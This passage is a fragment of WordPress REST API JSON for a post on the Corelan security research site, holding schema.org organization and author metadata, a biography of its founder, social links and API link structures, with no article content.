worldwide.","publisher":{"@id":"https:\/\/www.corelan.be\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.corelan.be\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/www.corelan.be\/#organization","name":"Corelan CyberSecurity Research","url":"https:\/\/www.corelan.be\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.corelan.be\/#\/schema\/logo\/image\/","url":"https:\/\/www.corelan.be\/wp-content\/uploads\/2026\/03\/corelanlogo2_small-20.png","contentUrl":"https:\/\/www.corelan.be\/wp-content\/uploads\/2026\/03\/corelanlogo2_small-20.png","width":200,"height":200,"caption":"Corelan CyberSecurity Research"},"image":{"@id":"https:\/\/www.corelan.be\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/www.facebook.com\/corelanconsulting","https:\/\/x.com\/corelanc0d3r","https:\/\/x.com\/corelanconsulting","https:\/\/instagram.com\/corelanconsult"]},{"@type":"Person","@id":"https:\/\/www.corelan.be\/#\/schema\/person\/3be5542b9b0a0787893db83a5ad68e8f","name":"corelanc0d3r","pronouns":"he\/him","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/3783bed6acd72d7fa5bb2387d88acbb9a3403e7cada60b2037e1cbb74ad451f9?s=96&d=mm&r=x","url":"https:\/\/secure.gravatar.com\/avatar\/3783bed6acd72d7fa5bb2387d88acbb9a3403e7cada60b2037e1cbb74ad451f9?s=96&d=mm&r=x","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/3783bed6acd72d7fa5bb2387d88acbb9a3403e7cada60b2037e1cbb74ad451f9?s=96&d=mm&r=x","caption":"corelanc0d3r"},"description":"Peter Van Eeckhoutte is the founder of Corelan and a globally recognized expert in exploit development and vulnerability research. 
With over two decades in IT security, he built Corelan into a respected platform for deep technical research, hands-on training, and knowledge sharing. Known for his influential exploit development tutorials, tools, and real-world training, Peter combines a strong research mindset with a passion for education\u2014helping security professionals understand not just how exploits work, but why.","sameAs":["https:\/\/www.corelan-training.com","https:\/\/instagram.com\/corelanc0d3r","https:\/\/www.linkedin.com\/in\/petervaneeckhoutte\/","https:\/\/x.com\/corelanc0d3r"],"url":"https:\/\/www.corelan.be\/index.php\/author\/admin0\/"}]}},"views":9939,"jetpack_publicize_connections":[],"jetpack_featured_media_url":"","jetpack_sharing_enabled":true,"_links":{"self":[{"href":"https:\/\/www.corelan.be\/index.php\/wp-json\/wp\/v2\/posts\/3530","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.corelan.be\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.corelan.be\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.corelan.be\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.corelan.be\/index.php\/wp-json\/wp\/v2\/comments?post=3530"}],"version-history":[{"count":0,"href":"https:\/\/www.corelan.be\/index.php\/wp-json\/wp\/v2\/posts\/3530\/revisions"}],"wp:attachment":[{"href":"https:\/\/www.corelan.be\/index.php\/wp-json\/wp\/v2\/media?parent=3530"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.corelan.be\/index.php\/wp-json\/wp\/v2\/categories?post=3530"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.corelan.be\/index.php\/wp-json\/wp\/v2\/tags?post=3530"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}
